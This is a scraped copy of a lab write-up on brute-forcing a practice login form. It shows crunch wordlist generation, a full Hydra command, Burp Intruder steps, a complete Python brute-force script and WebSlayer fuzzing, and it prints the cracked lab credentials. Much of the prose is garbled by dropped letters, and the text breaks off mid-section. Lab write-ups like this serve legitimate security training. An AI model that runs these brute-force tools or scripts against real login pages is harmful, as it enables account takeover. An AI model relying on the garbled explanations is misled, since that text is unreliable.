1. web-form brute force methods-libre
TRANSCRIPT
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 1/58
All information contained in here are for academic research, web application exploitation research, bug
hunting research, laboratory test bed uses, and for educational purposes only. The techniques shown
hee aet desiged to opoise lie ahies, e appliatios o a host. These tehiues ae
laid down on purpose for awareness and research, thereby the authors are not responsible for the
actions conducted by individuals in any form. Neither this document is transmissible or re-useable,
itte peissio fo the authos is a ust, failig to hih etai legal atios ight e pooked.
Web Form Brute Force MethodsDemonstration by Shritam Bhowmick
Web Application Penetration TesterIndependent Consulting Security Evangelist
Dated: 6th August, 2014, Springs, 4:00 PM IST
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 2/58
Web Application Exploitation with Shritam Bhowmick 2
This is web application penetration testing challenges hosted over pentesteracademylab.appspot.com, it
reflects several challenges for web application security researchers to break in a safe environment. This
is for Lab practice only and no part of this document were provided by the original authors.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 3/58
Web Application Exploitation with Shritam Bhowmick 3
Contents
Hack ............................................................................................................................................................... 4
Method 1: Using Hydra to Brute Force Web Logins: .................................................................................... 8
Method 2: Using Burp Suite Intruder to Brute Force Web Logins: ............................................................. 13
Method 3: Using Python to break Web-Form Login: .................................................................................. 32
Method 4: Using WebSlayer to Brute Force Web Logins: .......................................................................... 38
Method 5: Nmap Script Code to break web form: ..................................................................................... 48
Contact Information .................................................................................................................................... 58
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 4/58
Web Application Exploitation with Shritam Bhowmick 4
Challenge: Use Brute-force methods to hack into the login pages.
Target: http://pentesteracademylab.appspot.com/lab/webapp/1
Topic: Using Crunch and Brute forces on Web Application Web Forms.
Hack
Hack: So, the usernames are jack and admin for the challenge which were provided to us as a hint. We
have to create files for the users. Could be done on Linux by issuing the following commands:
#echo -e [email protected] \\[email protected] > users.txt
Note: eho ith -e sith is used to esape the \ hih is euied fo a lie feed. Also, a [spae]
ist appeded eause of the sae easo that itd eate a e lie ad stat itig fo the e
first instance without any spaces involved.
Generating custom password list with 5 minimum and the 5 maximum size with xyz as the character set.
Cuh: ed use uh to geeated ou o usto passod list, passods ould e fethed i
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 5/58
Web Application Exploitation with Shritam Bhowmick 5
case there were no hints provided, we could also later use Hydra to generate a username/password list
pio to ute foe attaks ut hee to keep thigs at ease, ee used uh. Note that fo e
appliatio hih do ot hit ou athig, ad oud ot epet a iiu o aiu legth fo
haates, o eithe the haates hih ae eig used fo the passod at the fist plae, use
fuzzdb. This includes usernames and password files which were pre-generated by the community for the
community of hackers. Use fuzzdb, for other injections as well, use if for dictionary attacks, if yououldt at a hid ased ute foe fo log eas usig a lo-end spec system at your disposal.
To generate passwords using crunch, which has minimum 5 characters and maximum 5 characters as
depicted by at the hit fo this patiula hallege, ith the haates theseles estited to ,
ad z, use the folloig oad at the Liu oad lie, o do ash opeatios. Athig helps!
#crunch 5 5 xyz > passwords.txt
What we have is a list of users and the list of password set. Look at the URL and see if the parameters
ae eig passed at the U‘L, if it is, its a GET ased euest. B default if the page soue doest
desie a ethod, its take as a GET ethod. To deostate this, input any dummy characters in
the input fields:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 6/58
Web Application Exploitation with Shritam Bhowmick 6
The paaetes as ell as thei alues ae efleted o the U‘L hih ofos its a GET euest hihis sent by the client to access the resource:
Now, if this is verified from the source, after we try to login, we will see there is no method described at
the source page, which means again that the default (if not specified by the source), the method would
be GET request:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 7/58
Web Application Exploitation with Shritam Bhowmick 7
The username hints and the domain given were jack and admin as users and domain as
pentesteracademy.com so possible username sets would be:
Now, that we have the valid usernames (before we used nick and admin to generate the username files
as an example which were invalid), we need to go and brute force the login with these set of charactersof useaes ad the geeated list fo passod takig , ad z ith iiu haates ad
maximum 5 characters as our password list. For this, there are four methods we can accomplish the
brute force on web applications:
1.)
Use Hydra for Brute Forcing
2.) Use Burp Suite as a web-client proxy for Brute Forcing with Intruder
3.) Using python scripts and designing a python script which goes ahead and brute forces the login
4.)
Using WebSlayer with Hydra generated password lists
5.) Using power of Nmap Scripting Engine to facilitate web form bruteforces.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 8/58
Web Application Exploitation with Shritam Bhowmick 8
Method 1: Using Hydra to Brute Force Web Logins:
About Hydra:
For web-based forms, you have to know much more information about the form you are attackingbefore you start the attack. Every web-based form is slightly different, different URLs and parameters,
and different responses for success or failure.
You need to know:
The hostname/IP and URL
Whether it is a HTTPS or HTTP service
Whether the form supports GET or POST (or both)
The parameters of the request
The difference in response between success and failure
Whether any session cookies are required to be set or maintained
What lockout features and thresholds are enabled (if any)
Now for an example consider the form fields, described below in the image:
Here consider the following:
1.)
Hostname: the hostname would be your target hostname, or an IP. Just that.
2.) URI: The Uniform Resource Locator would be the resource where the form could be located.
3.) Method: The method shown in the image is POST, but in
petesteaadela.appspot.o/la/eapp/, the oe ee ito, its GET, so ed use GET
rather than POST there.
4.)
Also, the URI or the URL rather is cut out from the rest of the host information and kept
subjective in enclosed double quotes.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 9/58
Web Application Exploitation with Shritam Bhowmick 9
5.) Hydra basically iterates through all the username/password combinations, until it gets a
response that does not contain the text blacklisted text or it does contain a whitelist string if
whitelist string is provided.
6.) The blacklist string would be the string that comes up if the user is not authenticated and throws
out a stig hih hda a pik up ad log, this ould e the stig hih if Hda does ot
fid, ill assue that its logged i ad log the useae ad the passod et hih eesuccessful in bruiting the web-login
7.) The whitelist is a different scenario and if Hydra has to detect web-login authentication success
proving the string by which hydra determines that it was a valid string, hydra will go ahead and if
any such whitelist is found, hydra would log the credentials for that very request sent i.e.:
username and the password for that request (POST or GET).
Not knowing or understanding the above information can be a big cause of failure.
The host is penesteracademylab.appspot.com
Its a GET ethod, so pik up the http-form-get eause its e fo as ell.
The U‘L o oe speifiall the fo fields situated i /la/eap/ i this ase.
With the form fields been set, append the email (users for authentication) and the passwords
with the appropriate user and password lists and note that this would be done in continuation
of the form fields in order to complete the form itself. The form fields declaration in hydra
ould e elosed i doule uotes: /la/eapp/:eail=^U“E‘^&passod=^PA““ ̂
We use eail ad passod as ou paaetes hee eause the source code has the email
and the password as its entry, if it were a different application, this might change!
Anything in-between ^_____^ specifies that hydra needs a feed into these places which turns
out to be username files and the password files respectively. Notice that there are more
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 10/58
Web Application Exploitation with Shritam Bhowmick 10
paaetes hih hda eeds to ute foe e logi fos hih is the easo, the doules
quotes are not closed yet.
The parameters are separated by colons (:) and the next step is to let hydra know when the
login goes success, for an instance while login, if a user fails to get authenticated, Hydra takes a
laklist stig like Failed o Authetiatio Failue as the stig ad detets if these laklistods do ot appea, the its a suessful logi, so ed hae to apped that as ell alog ith
the /la/eapp/:eail=^U“E‘^&passod=^PA““^; hih ould e doe e appedig et
another colon, for an example /lab/webapp/1:email=^USER^&password=^PASS^:laklist
stig
So for now, our whole query for hydra would be: hydra pentesteracademylab.appspot.com http-
form-get la/eapp/:eail=^U“E‘^&passod=^PA““^:Failed
Notice that the query ends now with the doubles quotes in place, we also mentioned the black
list stig to e Failed because in this web login, any failed login attempts generates the string
Failed! Please T Agai! hih ould e see elo:
Alteatiel e ould also poide hitelist strings in case we know the successful attempts
would look like, and the application never throws any strings on unsuccessful logins on web
forms. Now, if we are running Hydra from the directory where our users and password files
which were generated are stored, we could provide the users and the passwords list as it or
show the directory path for login users using the –L switch and password list using the –P switch,
which is: -L users.txt –P passwords.txt
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 11/58
Web Application Exploitation with Shritam Bhowmick 11
Next, we would also add threading because hydra supports parallel brute force power and 20 is
the maximum allowed integer for this with the –t switch
At last, we include –o sith to sae the esults i a tet file alled esults.tt
Final Query for Hydra: hydra pentesteracademylab.appspot.com http-form-get"/lab/webapp/1:email=^USER^&password=^PASS^:Failed" -L users.txt -P passwords.txt -t 20 -o
results.txt
This will fetch the valid logins and the passwords, if found using a blacklist string and store the results to
a tet file alled esults.tt.
#cat results.txt
Ad oull poal fid the useaes ad passods. Try them all in-case hydra goes wrong. For me,
the results looks like the following after Hydra went ahead and brute forced the web-login and hence
one of the username and corresponding password worked in the scenario:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 12/58
Web Application Exploitation with Shritam Bhowmick 12
That was for Hydra, but as we look here that Hydra is efficient and could get number of results and could
go wrong several times without any hints, there are some other ways we could accomplish this same
task, ell use ethod hih iludes usig a lient side proxy with Intruder attacks using these same
files geeated ith Cuh at ou disposal. Befoe e egi ith Bup, ell go though soe of the
basics for Burp which an attacker might need to now beforehand. If you are looking for a detailed
discussion on Burp Suite, refer to my other papers which goes deep into using Burp Suite as a Web
Application Swiss Knife, or use the compiled book delivered by me which has a section on Burp Suite and
using the tool to make most of the benefits.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 13/58
Web Application Exploitation with Shritam Bhowmick 13
Method 2: Using Burp Suite Intruder to Brute Force Web Logins:
About Burp Suite:
Burp Suite was designed by Portswigger to formulate a client side based web-proxy which assists
interception of HTTP requests and responses along with support for intercepting web-services based
traffic such as WSDL. Burp Suite has been written in Java Platform and provides extensions for various
other script with the help of Jython based platform which includes using Python scripting written for
Java. Most interestingly Burp Suite provides a framework for web security penetration testers to
intercept HTTP traffic, debug application, as well as black-box test web applications with included tool-
set like ‘epeate, Itude, Copae, Deode, and much more. The scope of this section covers
the Intruder, if you are interested in learning Burp Suite in details, there is a separate book written by
me on it and you could use them to expand your knowledge on this framework which would be
extremely helpful.
To use Burp Suite to the full extent, provided you have good VRAM storage, the following configuration
via command line on Linux would help start Burp Suite, which is included in Kali Linux already. This
version is the free edition of Portswigger Burp Suite. For Professional version, which penetration testers
use, oud euie to u a liese. Go though the Potsigge FAQ to know more.
Launching Burp Suite from the Linux Terminal with known good configuration:
Locating Burp Suite on Linux if installed:
Launching Burp Suite JAR file with good known configuration allotting 2 GB of VRAM on Java
Memory Settings on Linux:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 14/58
Web Application Exploitation with Shritam Bhowmick 14
Accepting the Burp Agreement and proceeding further:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 15/58
Web Application Exploitation with Shritam Bhowmick 15
The Intruder Tab is loated afte the “ae Ta, hih ed use fo ute foig the e-
form, this will make use of the generated previous usernames and the password list via crunch. But
efoe athig else, ed euie to setup the up listee to liste o poided HTTP port andforward out HTTP packets through Burp Suite Proxy. This requires configuration on the browser
because the HTTP packets requires to be forwarded to Burp via the browser, for this; go to:
Firefox/Iceweasel Preferences > Select Advanced Tab ad fid the Po “ettig, he this is doe,
the next step is to configure the browser to the below specified ports for Burp to intercept traffic:
After this has been done, anything that you browse via the browser will forward HTTP packets
(requests and responses, if responses are set to be intercepted) via the Burp Proxy which is newly
ofigued. To ake sue of this, o Bup “uite, go to the Po Ta ad ake sue Iteeptio is
set to O.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 16/58
Web Application Exploitation with Shritam Bhowmick 16
Bose the taget site, i this ase its http://pentesteracademylab.appspot.com/lab/webapp/1 ,
and note that the Proxy Tab now blinks and asks if any modifications are needed before forwardingthe requests to the web-server:
Click on forward and let the request be sent to the web-server and until the request is not
forwarded, the browser will wait for the response from the web-server. In-case Burp is configured to
iteept the esposes as ell, itd go ahead ad iteept the esponses before forwarding it to
the browser for web-page presentation. Now, that everything is ready, and the browser has the
response, we will use a junk values on this target to capture the HTTP request and send it to
Intruder when the proxy tab blinks next, for this enter any junk values in the web-login form fields
and hit sign in to start sending the HTTP request:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 17/58
Web Application Exploitation with Shritam Bhowmick 17
Once, the sign-i is hit, the po ta ill ask fo a odifiatios if eeded, hee ed eed to
right click the request heades ad sed it to the Itude, so e ould ute foe the fo
fields:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 18/58
Web Application Exploitation with Shritam Bhowmick 18
The Itude Ta o liks, ad ed eed to aigate to the Positios setio fo additioal
modifications like where our given payloads would land for the customized attacks:
Burp Auto-detects the form fields where the usernames and the password might be possibly
injected, we can change this to our liking but the default payload set by the special characters in
burp such as anything enclosed in $ an $ in this case is the suitale seaio; ell hek the
luste o attak tpe eause e hae to fields hih e eed to attak, fist oe eig
eail hee ou useae paload ould fit ad the seod eig the passod hee ou
generated password file from crunch will fit; the Sniper attack type is for one payload at one
field at a time, which is false in this case:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 19/58
Web Application Exploitation with Shritam Bhowmick 19
Remember, we have two payloads, one for usernames and another for passwords. From here,
e ill go to the Paloads setio of Itude ta ad use “iple List as the Paload Tpe
ad use Load fo the Paload Optios to load ou use geeated list file:
Clik ope ad Bup ould set the uses.tt file fo paload hih oespods to the eail
field. Next, we also had second payload which needs to be set, the password.txt which weregeeated peiousl Bup, fo this, ed selet Paload “et to ad the hoose
appopiate opeatios hih e did fo Paload ut hee ou file ill e the geeated
password list via crunch:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 20/58
Web Application Exploitation with Shritam Bhowmick 20
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 21/58
Web Application Exploitation with Shritam Bhowmick 21
All paloads hih fa e et though ee “iple List, eause the ae aiage-return
sepaated files hih otai useaes fo the eail filed ad passods fo the passod
field which we previously enumerated looking at the form-fields from the source page.
When everything is set-up, e ould euie to aigate to the Itude optio fo the
menu-a ad lik o “tat Attak, folloig hih Bup “uite ould go ahead usig its on
browser user-agent engine, parsers etc. and brute force the form fields:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 22/58
Web Application Exploitation with Shritam Bhowmick 22
As fo o, e ould see that the Itude had stated ad is ute foig the e-form.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 23/58
Web Application Exploitation with Shritam Bhowmick 23
Next is detecting the successful logins, if any. By default any credentials you throw at this
patiula e appliatio ill feth ou a OK espose ith the ‘espose Code eig
, ad the ‘easo eig OK look at HTTP ‘FCs fo oe details ad at the gie HTTP
document by me). Now, unsuccessful logins will e gie OK espose, ut if e ouldsoeho eliiate fo the olu ta, hat ould e left is the status ode iludig
3xx which would be redirect responses, 4xx which would be bad client side errors, 5xx which
would be any server side errors. Beyond that 2xx are informational, which in this case needs to
e eliiated, e hek ith this appoah fist; to do this, e hoe oe the Filte hih
uetl sas “ho All, left lik ad de-selet ‘esposes, ad o ed e left ith 3xx,
4xx and 5xx responses only:
No, Itude shos, its hidig a ifoatioal esposes, ad shoig us , ad
5xx responses:
But, e haet ade still eause e see thee ee o esposes hih iluded a
redirection which could hint us with a successful login or anything which might hint a successful
Brute force of the provided credentials for this attack.
What else could be possible scenarios to look for a successful login? This could be the received
content-length header. Now, the next tactical concept is, we receive 2xx for all successful logins
as well as unsuccessful logins, nothing is being redirected which is the reason there were no 3xx
status codes on completion of brute force; but we see that the content-length for all the
esposes hih ee set ee sae, this is poided the Bup Itude usig the Legth
olu o Itude upo statig the attak :
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 24/58
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 25/58
Web Application Exploitation with Shritam Bhowmick 25
We de-selet the oes e do ot eed, pefeal, pesoall Id de-selet euest, eo,
status, tieout, oet ad athig else eept the paloads Bup ade usig the
custom tailored payloads and the Legth. Beause Legth is hat e eed fo fous, ad
status ist the oe hee ad hee e eai ol ith the paloads ad the otet-
length which came with the response header:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 26/58
Web Application Exploitation with Shritam Bhowmick 26
Now, closely looking at it, and scrolling down from the numerous requests made by Burp, we get
a eeptioal Legth alue hih has a diffeet alue fo the othe idetial oes.
This is where we need to stop and inspect:
The legth alue is diffeet, ad the paloads hih ee the edetials fo eail and
passod ee [email protected] ad zzz espetiel. Upo ispetio o
the espose ta, ad lookig at the ‘ede ta, the Bup Bose Egie ill ede, ad e
can be presented with how would it look if an user submitted those credentials:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 27/58
Web Application Exploitation with Shritam Bhowmick 27
And that meant the challenge was cracked and we could use those credentials to verify that
useae as eail ee [email protected] ad passod used fo this
patiula eail as zzz as passod as pe the GET request parameter).
Go to Bose pefeees, use the o-po so ou ould oall ose all sites ad pess
OK fo Bup ot to iteept, o alteatiel, go to Bup “uite Po Ta, ad lik
Iteeptio Off to disale iteeptio of any traffic. Another alternative method is using an
addo alled sap-po ad othe addos siila:
Render the original target page at http://pentesteracademylab.appspot.com/lab/webapp/1 and
enter the credentials Burp had cracked using Intruder:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 28/58
Web Application Exploitation with Shritam Bhowmick 28
Ad, oull get the ogatulatios hih eat, the edetials ee aked ad suessfull
bruited using Burp Suite Client Side Proxy usig Itude ad usto tailoed paloads.
Alternative to using Crunch: If Crunch is too much pain and making dictionaries automated is the
goal, Burp Suite as a framework could be used to make dictionary files automatically using the
Itude ta, hees ho oe ould go ahead ad autoate the ditio geeatio usig ,
ad z as haates ad passod opleit set to iiu ad aiu fo these
characters:
O the paload ta, set paload tpe t siple list ad auall add the useaes hih
hee as a eaple ould e [email protected] ad
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 29/58
Web Application Exploitation with Shritam Bhowmick 29
Clik add ad otiue addig the useaes to ou ofot, the et oe shall e
Notie that peious useaes ee added, o selet Paload “et to ad selet Paload
Tpe as Butefoe:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 30/58
Web Application Exploitation with Shritam Bhowmick 30
Well use the haate set as z i this deostatio eause thats the set of passod
characters being used, make sure in any other scenario, you need to determine this and add
these charactes to the likel seaio, o if thats ee set, set the Mi. Legth to ad the
Ma. Legth to eause thats the passod opleit fo this deostatio. Eethig
happes i the Paload Optios fo Bute Foe set to the Paload “et
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 31/58
Web Application Exploitation with Shritam Bhowmick 31
Afte eethig is set up ad doe, go to the Itude o the eu-bar discussed before and
start the attack, the results would be the same. Check the content-length as discussed before
and look for the responses which renders the granted access.
The ‘ede ould o ede the epesetatio of the HTML as a ose egie ould ad
we can therefore determine that the password were indeed cracked via Burp Intruder. Now,
thee used to e aothe alteatie ethod hih uetl is epeietal ad doest ok
popel usig the ee esios of oses o Fiefo, pefeal ade fo Fiefo as a .pi
addo, this addo as alled FieFoe liked efeeed at:
http://www.scrt.ch/en/attack/downloads/fireforce
Documentation for usage of Fireforce as a web-form login bruteforcer could be found here:
http://www.scrt.ch/outils/fireforce/fireforce_en_manual.pdf
An added reference for Fireforce and how it does, what it is supposed to be doing could be
found here: http://www.securityaegis.com/easy-breezy-beautiful-password-attacking/
The ethod fo this as ot iluded i this douet eause Fiefoe feezes o age
operations on newer firefox web-browsers. As soon as Fireforce releases a stable version foree esios of Fiefo, itd likel e iluded in this document. Next, we will look at
developing a python script to break the password, using python libraries. For python, first step
would be to learn python, because without knowing python libraries and how python works,
oe ouldt e ale to automate all of this developing his/her own scripts. To be able to
autoate etai e appliatio eploitatio, peetatio testes use ptho sipts hih
they develop out of their own expense of free time. This would be shown in the next method,
but it is recommended, people learn python to be able to understand whole of it.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 32/58
Web Application Exploitation with Shritam Bhowmick 32
Method 3: Using Python to break Web-Form Login:
About Python:
Using version 2.7.3:
Python terminal:
#python
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 33/58
Web Application Exploitation with Shritam Bhowmick 33
Exiting Python terminal command-line test environment: #exit()
Eough of the asis, its tie to deelop a sipt hih alls the ptho eeutale fo the
Linux and loads up for the script we develop before it could do anything with the script. For this,e use the shebang to ake sue efoe eeutig ou ode sipt, the Liu eioet
ipots the ptho eeutale fo /us/i hih has a file alled ptho, ed hek hat
this file is and learn to locate or find where python is issuing the following commands, but first
e eate a file alled e-form-ute.p usig the touh oad, so late e a stat
writing our code here:
The loate oad ould geeate uh oe esults, ut fo eeutales, ed use the
heeis oad to fid hee ptho ould e so that late e ould use this dieto to
all the ptho eeutale usig sheag efoe the loated file ad the otiue itig
our code:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 34/58
Web Application Exploitation with Shritam Bhowmick 34
At this point, we have many versions of python istalled, the default ed pik up is the oe at
/us/i/ptho. No to use the sheag hih is epeseted #!, e ould hae to fist
use a text editor to first open the file which we had created:
We use ao, a tet edito hih is GNU ased in Linux. Other options on Linux are pico, vim,
gedit, leafpad and emac. There are ton of text editors available, once loaded, the screen
popts us to ite tet ito the edito see, hee e egi ith ou sheag to ilude thepython executable:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 35/58
Web Application Exploitation with Shritam Bhowmick 35
The code:
#! /usr/bin/python
from urllib import urlopen
import itertools, sys
def gen_passwords(universe,l):
# use itertools to create a list of all password permutations
wl = []
for i in itertools.product(universe,repeat=l): wl.append("".join(i))
return wl
def brute(username):
root_url =
"http://www.pentesteracademylab.appspot.com/lab/webapp/1?email="+username+"@pentesteracademy.com&password="
# want to be able to enter a password on the command line and only send thatone test
if len(sys.argv) < 2:
wl = gen_passwords("xyz",5)
else:
wl = [sys.argv[1]]
for pw in wl:
full_url = root_url+pw
p = urlopen(full_url).read() if not "Failed!" in p: # success
print "Username: ",username," Password: ",pw
break
else:
print "Password: %s failed"%pw
brute("admin")
brute("jack")
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 36/58
Web Application Exploitation with Shritam Bhowmick 36
The Python Code:
oot_ui ould e the hole GET U‘L hih ould the take useae from the defined
useaes hih ae jak ad adi fo this deostatio, the def futio ute does this
jo. Also e use itetools as ou lia to iteate. The defied futio alled ge_passods
takes care of the loop which generates a peutale list of , ad z fo iiu to
aiu haate list ad the heks the uted passods hih did ot geeate Failed
string and hee tigges the suess appeded to the uted list of passods. Befoe oig
futhe hod + the ptho ode file to eeute:
Net, use ./e-form-ute to eeute the ode file ad u the sipt:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 37/58
Web Application Exploitation with Shritam Bhowmick 37
The sipts egis the utefoig ad util e see the suess stig appeded to the
generated password of password complexity 5 minimum and 5 maximum, we have to keep
looking at the results. Once Bruteforce gets over and the script has been executed, check
through the logs generated (for this once could had redirected the output to something like:
./web-form-brute > results_brute.tt fo the eeutio poit ad look fo the suess stig;
hoee, e do get the suess stig hee hih ould e useful fo a suessful logi:
The passod is zzz ith the use eail eig used as adi hih eas
[email protected] ould e the eail fo the logi fo. Use ith the passod
generated and we will get a successful login:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 38/58
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 39/58
Web Application Exploitation with Shritam Bhowmick 39
Oe just eeds to tigge eslae fo his/he teial the a its sho aoe.
Net, ed see a see ith diffeet tas hih epeset aftigof different types of
payloads and ton of things by which we can generate our own custom payloads and brute using
these generated payloads:
Capture the request by LiveHTTP Headers which just gives an easy way to input right headers
which would be thrown this fuzze. The addo ed e usig hee is Lie HTTP Heades
which is available in Firefox or any other tool-set which has the same functionality like Burp,
Fiddler, Charles Proxy and many more. If Live HTTP Headers is installed in Firefix (or Iceweasel),
bring it up from the menubar, goto tools and click on Live HTTP Heaaders.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 40/58
Web Application Exploitation with Shritam Bhowmick 40
Make sue the Captue is tued o ad efesh the page fohttp://petesteaadela.appspot.o/la/eapp/as shown below:
When done, the page refreshed and all the packets along with the headers went through the
Live HTTP headers and hence Live HTTP Headers captured the HTTP headers because it was set
to Captue, ou et oe is to op all these eat heades hih ee sent by the original
browser client to Webslayer to pretend to be an original client as an original browser client
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 41/58
Web Application Exploitation with Shritam Bhowmick 41
would be.
This as the e fist euest hih the liet ade, ad hee, e lik o ‘epla to see o
copy or replay the original set euest et agai. Afte likig o the ‘epla, soethig like
elo pops up:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 42/58
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 43/58
Web Application Exploitation with Shritam Bhowmick 43
We do ot eed a PO“T data to e set eause the fo does ot hae PO“T ealed to it.
This is the attack pre-setup, now, before we generate out payloads, we need to set the keyword
FU)) to the heades, paaetes o a field hee ed like We“lae to ute ou
geeated lists of useaes o passod. I Weslae, oe eeds to ko the useaes to
brute the passwords (which is the limitation) but in this case to demonstrate how an attacker
tool-set is used, e alead ko the useae hih is [email protected] adwe need to generate password list of minimum 5 and maximum 5 with the help of WebSlayer.
Hee, e ko the paaetes hih ed e tig to ute is a GET request with parameters
eail ad passod. We also ko the eail paaete ould take
[email protected] ad passod is the paaete ed eed to fuzz; so ed
quickly change the URL from the Webslayer to suit our needs (notice the URL, when we put
juk alues ito the logi fo usig oigial ose, the ose geeates a GET ased U‘L
which reveals the whole URL):
“o, e feed this U‘L to the We“laes U‘L ad ake soe hages, ell see hat ae the
changes which is required. For now, we just need to copy this GET based request to WebSlayer.
No, that the oigial GET ased euest had ee fed to We“laes U‘L ta, e eed to
make the changes to these parameters:
a.) email
b.) password
We know the usernames to e [email protected], ad e eed to FU)) the
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 44/58
Web Application Exploitation with Shritam Bhowmick 44
passod paaete, so the alue fo eail paaete ould e
[email protected] ad the alue fo the passod paaete ould e FU))
since we need to brute this parameter in order to determine the credentials; so the URL
eoes ot that FU)) is a keod, athig ou put the te as FU)) ill e take as a
target input feed for Webslayer.):
Notice the changes made to the URL for WebSlayer to be configured so that it could take
[email protected] as the useae ad the paloads e geeate o the
passod paaete. The alue of the eail paaete eais itat.
After this initial set-up, ed eed to geeate a passod list, selet the Paload Tpe as
Ditioa as shown here:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 45/58
Web Application Exploitation with Shritam Bhowmick 45
I this attak, e ae usig the Ditioa passods file peiousl eated eause afte a
thoough iestigatio, I foud that e aot use the paload optio sie the paload fails at
generatig the iiu ad aiu haates usig oiatio, it ol suppots
peutatio ith a fied idth tpe alog ith the gie haates hih ae , ad z.
“o, oe e the Ditioa attak tpe is seleted, e ould geeate the list via crunch; here
ell use the peiousl geeated list. Load up the list likig o the … optio ad selet
the list file. The list file hee is aed as passods.tt:
Afte opeig up the list hih is passods.tt, lik “tat:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 46/58
Web Application Exploitation with Shritam Bhowmick 46
Oe “tat is hit, e ae take to Attak ‘esults ta:
Belo e a “top o Pause the uet attak ad see the paload poessig:
Oe, eethig fiishes, a gee stig ould sho up the suessful eak do of thepassword ith the gie eail paaete alue as [email protected] ad
passod alue set to FU)) to go though the paload poessig:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 47/58
Web Application Exploitation with Shritam Bhowmick 47
Hee e see that the Paload zzz as stig ith its MD oked, fo hee, e a hit o
‘espose HTML to eif if the passod ith the supplied useae logi as aked:
Use the sae Paload etated at this point to login via the original browser, and same resultsould e ahieed. Hoee, thee ae plet uh oe optios i We“lae in the
